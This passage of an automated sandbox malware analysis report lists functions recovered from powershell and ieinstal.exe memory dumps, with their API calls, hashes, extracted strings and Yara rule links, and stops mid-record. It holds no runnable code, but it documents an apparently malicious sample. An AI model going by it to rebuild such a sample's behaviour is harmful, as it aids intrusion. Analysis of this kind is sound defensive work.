Function 0835215C Relevance: 1.6, APIs: 1, Instructions: 130pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08352288

Memory Dump Source

Source File: 0000000D.00000002.1812464201.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8350000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 2d20e607434e97f27ff758cd8429d8e625effd5bd4a540e508d5aa3558f32d48
Instruction ID: c95a1adc26ed0181dbefeeb5f163b44ab62428e92a95106f3c9afabfd3bac26f
Opcode Fuzzy Hash: 2d20e607434e97f27ff758cd8429d8e625effd5bd4a540e508d5aa3558f32d48
Instruction Fuzzy Hash: 87513671D01358DFDB14CFAAC984B9EFBF2AF88314F25812AE918AB251D7709880CF51

Uniqueness

Uniqueness Score: -1.00%

Function 08366304 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,08366B1F,00000000,00000000,00000003,00000000,00000002), ref: 08366C2A

Memory Dump Source

Source File: 0000000D.00000002.1812590622.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f2923bc024738c64c296d9ef02e1434e50e4bbf65a7fdee677df5a5a69b4e847
Instruction ID: ec4cffe8da493eb97a4327e6fceed14c27fd15428ead37fbd30db149273c69b2
Opcode Fuzzy Hash: f2923bc024738c64c296d9ef02e1434e50e4bbf65a7fdee677df5a5a69b4e847
Instruction Fuzzy Hash: 9F2137B2900659AFCB10DF9AD945ADEFBB8FB48320F04811AE915A7210D374A960CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 04F15460 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000), ref: 04F16C40

Memory Dump Source

Source File: 0000000D.00000002.1782016079.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4f10000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6b159f355414ddac00eb7053a7e248aa5cfac20eff6431fe2610ab8558db4a61
Instruction ID: 869cce8c87d5f9fe54b9d9459385f7228f56a3c7a97ab6f7deeb819dcb2b00f3
Opcode Fuzzy Hash: 6b159f355414ddac00eb7053a7e248aa5cfac20eff6431fe2610ab8558db4a61
Instruction Fuzzy Hash: 1A2164B1D002599BCB10DF9AD944B9EFBF4FB48324F00811AD918A3300D374A900CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 04F16BC8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000), ref: 04F16C40

Memory Dump Source

Source File: 0000000D.00000002.1782016079.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4f10000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c7b905678a0a139d12ae646c33c0249b949f316f489c6fb1e04989f672b1afc8
Instruction ID: c2ae51adcbb10dd925dddd02d24efef0655a1ba58ef5b656ae2094bd6895ddb9
Opcode Fuzzy Hash: c7b905678a0a139d12ae646c33c0249b949f316f489c6fb1e04989f672b1afc8
Instruction Fuzzy Hash: FA1144B1C002599BCB10CFAAD948A9EFBF4FB48324F04821AD918A7310D774A940CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 08351A39 Relevance: 1.5, APIs: 1, Instructions: 36pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08352288

Memory Dump Source

Source File: 0000000D.00000002.1812464201.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8350000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 94e91be6664704b5b37600bdaf8bd0463d5271d7c6c2bd49a83b6d9c6847fb33
Instruction ID: fef4df4282db65ebb4c959426d82bd318b1d5ec5676f33e7b594d2e8a187fdca
Opcode Fuzzy Hash: 94e91be6664704b5b37600bdaf8bd0463d5271d7c6c2bd49a83b6d9c6847fb33
Instruction Fuzzy Hash: 5D01A234C00248DFDF94CFE9C188B9EBBF0AF8531AF25841ED814A7291C7B84485CB11

Uniqueness

Uniqueness Score: -1.00%

Function 04A7D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1780737044.0000000004A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4a7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ad86b500a0dfc715e0a52d5d0b471f18c3325323bf729a1a4003e64b7c0fdd0
Instruction ID: 2140ae058df97be104f42e04b134902a31cdde69563dee017f0fb88524359768
Opcode Fuzzy Hash: 9ad86b500a0dfc715e0a52d5d0b471f18c3325323bf729a1a4003e64b7c0fdd0
Instruction Fuzzy Hash: B101F731508340AAEB304F25DDC4B67BFE8DF41278F08801AED4A4A282D379A942C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 04A7D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1780737044.0000000004A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4a7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c353979656cd8dbd59e78162dab549bda9a3063b5df3e68bf134b13c0acd89f6
Instruction ID: 81376383a25dafd791b0a9424e39c0081698f88031679deb5cbe0e3de149ec89
Opcode Fuzzy Hash: c353979656cd8dbd59e78162dab549bda9a3063b5df3e68bf134b13c0acd89f6
Instruction Fuzzy Hash: C501717100E3C09FE7228B259D94B62BFB4DF53224F0D80CBD9888F293C2699849C772

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04F1E7EF Relevance: 10.1, Strings: 7, Instructions: 1307COMMON

Download Yara Rule

Strings

c2l, xrefs: 04F1EAEE
4c2l, xrefs: 04F1EAB4
(_2l, xrefs: 04F1F402
tP2l, xrefs: 04F1F342
`Q2l, xrefs: 04F1F802
$2l, xrefs: 04F1F282
0ohj, xrefs: 04F1F9C2

Memory Dump Source

Source File: 0000000D.00000002.1782016079.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4f10000_powershell.jbxd

Similarity

API ID:
String ID: (_2l$0ohj$4c2l$`Q2l$tP2l$$2l$c2l
API String ID: 0-2100766246
Opcode ID: 704d1ea395702ab79ffe2b0754ebb898e21a37b893ac9655db377e24fca457f0
Instruction ID: 6a583a753de7ce01c8e8b183c89fb55342c8a26c4e4e5ab930efba4dcef0c6c6
Opcode Fuzzy Hash: 704d1ea395702ab79ffe2b0754ebb898e21a37b893ac9655db377e24fca457f0
Instruction Fuzzy Hash: 1EA2EE307082145FEF58ABB0DD11FEF3263EBC5714F1681299A0A9BB85CF729D419B92

Uniqueness

Uniqueness Score: -1.00%

Function 04F1E820 Relevance: 10.0, Strings: 7, Instructions: 1287COMMON

Download Yara Rule

Strings

c2l, xrefs: 04F1EAEE
4c2l, xrefs: 04F1EAB4
(_2l, xrefs: 04F1F402
tP2l, xrefs: 04F1F342
`Q2l, xrefs: 04F1F802
$2l, xrefs: 04F1F282
0ohj, xrefs: 04F1F9C2

Memory Dump Source

Source File: 0000000D.00000002.1782016079.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4f10000_powershell.jbxd

Similarity

API ID:
String ID: (_2l$0ohj$4c2l$`Q2l$tP2l$$2l$c2l
API String ID: 0-2100766246
Opcode ID: 77b2f4862ad8f445a5c2dc03b91e0ce625731b0a56487d3a899037d0bc88311f
Instruction ID: 9b9bf33242f36ec536ac0ffe0608194fe5cf5745245ac21170893b658fa9b0e7
Opcode Fuzzy Hash: 77b2f4862ad8f445a5c2dc03b91e0ce625731b0a56487d3a899037d0bc88311f
Instruction Fuzzy Hash: 7FA2DE307082145FEF58ABB0DD11FEF3263EBC5714F1681299A0A5BB85CF729D419B92

Uniqueness

Uniqueness Score: -1.00%

Function 08355430 Relevance: 4.2, Strings: 3, Instructions: 491COMMON

Download Yara Rule

Strings

"j, xrefs: 08355BFC
4'2l, xrefs: 08355695
"j, xrefs: 08355AD9

Memory Dump Source

Source File: 0000000D.00000002.1812464201.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8350000_powershell.jbxd

Similarity

API ID:
String ID: "j$"j$4'2l
API String ID: 0-1241910781
Opcode ID: 71039240cea17dc88466cc2bfd0797181b039e1b83afdf4abe543379efc1a595
Instruction ID: 8a3e1724dcf4ae0dedaab104a9ce1a4a753df174d7f40b3007dc1057eac635ed
Opcode Fuzzy Hash: 71039240cea17dc88466cc2bfd0797181b039e1b83afdf4abe543379efc1a595
Instruction Fuzzy Hash: 6D222D74A042588FDF54EFB4C9547AEB7B2FF84304F1285A9C109AB254DF39AE418F52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ieinstal.exePID: 416, Parent PID: 4736COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	83.3%
Signature Coverage:	33.3%
Total number of Nodes:	6
Total number of Limit Nodes:	1

Executed Functions

Function 1F002F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F002F0A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4346fbfc9875250985f6787e1bfb18793c131c284c19b5f03c441a4a39796dc
Instruction ID: fcf8ce118f3033714ac5a7c9284728e1537ba4caba57fc62ad11debafa6555c0
Opcode Fuzzy Hash: e4346fbfc9875250985f6787e1bfb18793c131c284c19b5f03c441a4a39796dc
Instruction Fuzzy Hash: 9D90022121584043D710E6684D14B0B104547D0303F91C519B0144914CC925CA626521

Uniqueness

Uniqueness Score: -1.00%

Function 1F002E50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002E5A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6cae83e19a769a8524630413bc0c645717099f2806ed3a1d6615ae5094c8aa46
Instruction ID: 0711911ca55cbde9fa13838f6163818e34553e15083eedd12781629d085e1e08
Opcode Fuzzy Hash: 6cae83e19a769a8524630413bc0c645717099f2806ed3a1d6615ae5094c8aa46
Instruction Fuzzy Hash: 6190026134504443D710E2584514B0A104587E1301F91C419F1054914DC629CE537126

Uniqueness

Uniqueness Score: -1.00%

Function 1F002EB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002EBA

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 308efb8ea0e03b3347e0facfc97086cd9c57c031288c05bf5645c6897b2c6340
Instruction ID: 2f3a70eb85f274611ec0390d5798bc6c232cdfc232d9dab7baa3b072b76d9506
Opcode Fuzzy Hash: 308efb8ea0e03b3347e0facfc97086cd9c57c031288c05bf5645c6897b2c6340
Instruction Fuzzy Hash: B890023120544403D710E258491470F104547D0302F91C415B1154915DC635CA527571

Uniqueness

Uniqueness Score: -1.00%

Function 1F002ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F002EDA

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88f7ffb269f5de5f165c6ef2edd1cc46d27201777ec9343ccfc1b7b66b283868
Instruction ID: c0fe3c19b097a19f294fbddc1fdcceffe31899175d1b07253d7f0fba549bc70e
Opcode Fuzzy Hash: 88f7ffb269f5de5f165c6ef2edd1cc46d27201777ec9343ccfc1b7b66b283868
Instruction Fuzzy Hash: 10900221605040438750F268894490A50456BE1211791C525B0988910DC569CA666665

Uniqueness

Uniqueness Score: -1.00%

Function 1F002D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002D1A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 08886b06bfe3e3da4b3bb60dbb4d6c9149239d03ba48e5dc6c3d5d5b564925e3
Instruction ID: 36a6d5be725ea9d390a6a1e3b10dc489212da1fa02406a7483694aea1fe2dfe0
Opcode Fuzzy Hash: 08886b06bfe3e3da4b3bb60dbb4d6c9149239d03ba48e5dc6c3d5d5b564925e3
Instruction Fuzzy Hash: 0B90023120504413D721E258460470B104947D0241FD1C816B0414918DD666CB53B121

Uniqueness

Uniqueness Score: -1.00%

Function 1F002DA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002DAA

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19e4cdd7c9a0340bec6d175b9b7fee6494161af7e1cb770c3b4bbee2a96d0b85
Instruction ID: 54dbf8f8fd225a9bd417c46339b5c16176c2b1f3d01fd05fbf3be2503a349e76
Opcode Fuzzy Hash: 19e4cdd7c9a0340bec6d175b9b7fee6494161af7e1cb770c3b4bbee2a96d0b85
Instruction Fuzzy Hash: 6390022160504503D711F258450461A104A47D0241FD1C426B1014915ECA35CB93B131

Uniqueness

Uniqueness Score: -1.00%

Function 1F002DC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002DCA

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d16f7f2302ca54a196e540d07f16467c966cfb8db301db32bf1e21a247bd43db
Instruction ID: 11495b2659597b20f065249d00725114191ee6bfdd7dc60b618891e78be53926
Opcode Fuzzy Hash: d16f7f2302ca54a196e540d07f16467c966cfb8db301db32bf1e21a247bd43db
Instruction Fuzzy Hash: A490027120504403D750F258450474A104547D0301F91C415B5054914EC669CFD67665

Uniqueness

Uniqueness Score: -1.00%

Function 1F002C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002C3A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 884bb502ec36b1fd2ee489ad6776424108b9ea874c5619d0d7b0e6303b73b5cb
Instruction ID: e2ab0aeeda9469908ea9ea7c0e16ffdd77cbc30a010dc112590a404559b48dc1
Opcode Fuzzy Hash: 884bb502ec36b1fd2ee489ad6776424108b9ea874c5619d0d7b0e6303b73b5cb
Instruction Fuzzy Hash: F690022921704003D790F258550860E104547D1202FD1D819B0005918CC925CA6A6321

Uniqueness

Uniqueness Score: -1.00%

Function 1F002C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002C5A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b0036e3c66c86b9fa27dc9a3cff148487b9bf168b3eab7d536ceb111be4a669
Instruction ID: 5b7cb62c22f22e67ea60a610da40e69cea593db20bba6f22044776ced28d78ee
Opcode Fuzzy Hash: 8b0036e3c66c86b9fa27dc9a3cff148487b9bf168b3eab7d536ceb111be4a669
Instruction Fuzzy Hash: CC90022130504003D750F258551860A504597E1301F91D415F0404914CD925CA576222

Uniqueness

Uniqueness Score: -1.00%

Function 1F002CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002CFA

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b641b077246c95d7526ae3f86aa56615c479bc6ac64affb3138d371cc333ea5
Instruction ID: 238752bf18810b38930b61960f2f40c91ad73bf090ba50852223580f2cee0113
Opcode Fuzzy Hash: 3b641b077246c95d7526ae3f86aa56615c479bc6ac64affb3138d371cc333ea5
Instruction Fuzzy Hash: A1900221246081539B55F258450450B504657E02417D1C416B1404D10CC536DA57E621

Uniqueness

Uniqueness Score: -1.00%

Function 1F002B10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002B1A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 320165abfb8069bf6d6ffd71caf8832633991e8183277e1b5a45e028ccc7ebef
Instruction ID: 9f02031957b5d52c4613a8f756f6279c952796221865118173ee6b7c406cd855
Opcode Fuzzy Hash: 320165abfb8069bf6d6ffd71caf8832633991e8183277e1b5a45e028ccc7ebef
Instruction Fuzzy Hash: 6590023120504803D790F258450464E104547D1301FD1C419B0015A14DCA25CB5A77A1

Uniqueness

Uniqueness Score: -1.00%

Function 1F002B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002B9A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cde1a84d8db4805c02eb07b020637de23efea6aeebfd8466db8f1feefe6ec7dd
Instruction ID: 2b2fec219b82a9fc516c031746ede559d7f4ffaac8687294634cd92dfb5b7643
Opcode Fuzzy Hash: cde1a84d8db4805c02eb07b020637de23efea6aeebfd8466db8f1feefe6ec7dd
Instruction Fuzzy Hash: 2D9002312050C803D720E258850474E104547D0301F95C815B4414A18DC6A5CA927121

Uniqueness

Uniqueness Score: -1.00%

Function 1F002BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002BCA

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62a7162c0f1389f33c118968445efb421104e36a352122539db3a8ee85c31bfc
Instruction ID: 8ab022eb3ae88229f93eafc322f9d7ba6f6200ecbf8cca1d66aa1af7958853ee
Opcode Fuzzy Hash: 62a7162c0f1389f33c118968445efb421104e36a352122539db3a8ee85c31bfc
Instruction Fuzzy Hash: E290023120504403D710E698550864A104547E0301F91D415B5014915EC675CA927131

Uniqueness

Uniqueness Score: -1.00%

Function 1F002A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002A8A

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0188ea4ff20844f9eb2fef12d4cd3541a3845b621331f31729c5718030829b9a
Instruction ID: 60be59c72a0fd3fc548bb2fbfcb5b10a75d6324fea8f57d42ff33e33eb1cf0e5
Opcode Fuzzy Hash: 0188ea4ff20844f9eb2fef12d4cd3541a3845b621331f31729c5718030829b9a
Instruction Fuzzy Hash: 51900261206040038715F258451461A504A47E0201B91C425F1004950DC535CA927125

Uniqueness

Uniqueness Score: -1.00%

Function 1F0029F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F0029FA

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad51eefa78af9f880475c8e8e7395116e37b5c5e0d8af539d35d49132914b294
Instruction ID: a34207165b2c173cbd72882ab8d6cf6281484ce5d54ef5e4a2f307d6ddfae32a
Opcode Fuzzy Hash: ad51eefa78af9f880475c8e8e7395116e37b5c5e0d8af539d35d49132914b294
Instruction Fuzzy Hash: 68900225215040034715E658070450B108647D5351391C425F1005910CD631CA626121

Uniqueness

Uniqueness Score: -1.00%

Function 0300E11D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNELBASE ref: 0300E127

Strings

L, xrefs: 0300E13A

Memory Dump Source

Source File: 0000001B.00000002.1967976896.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_3000000_ieinstal.jbxd

Similarity

API ID: TerminateThread
String ID: L
API String ID: 1852365436-2909332022
Opcode ID: fd7d4cbd7eec68ad2f778e78a49294e3b8743f23d35729a1dd7f100210126f0d
Instruction ID: 31bf8ad0ffb1fb141627cfdfefea417931313cb916dead3ba5e725efaf394f06
Opcode Fuzzy Hash: fd7d4cbd7eec68ad2f778e78a49294e3b8743f23d35729a1dd7f100210126f0d
Instruction Fuzzy Hash: 83C08065A6170752FB2415584D717CB221B5F82721FD4435F4E25C04D4C32D40CD4719

Uniqueness

Uniqueness Score: -1.00%

Function 1F002B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1F002B44

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

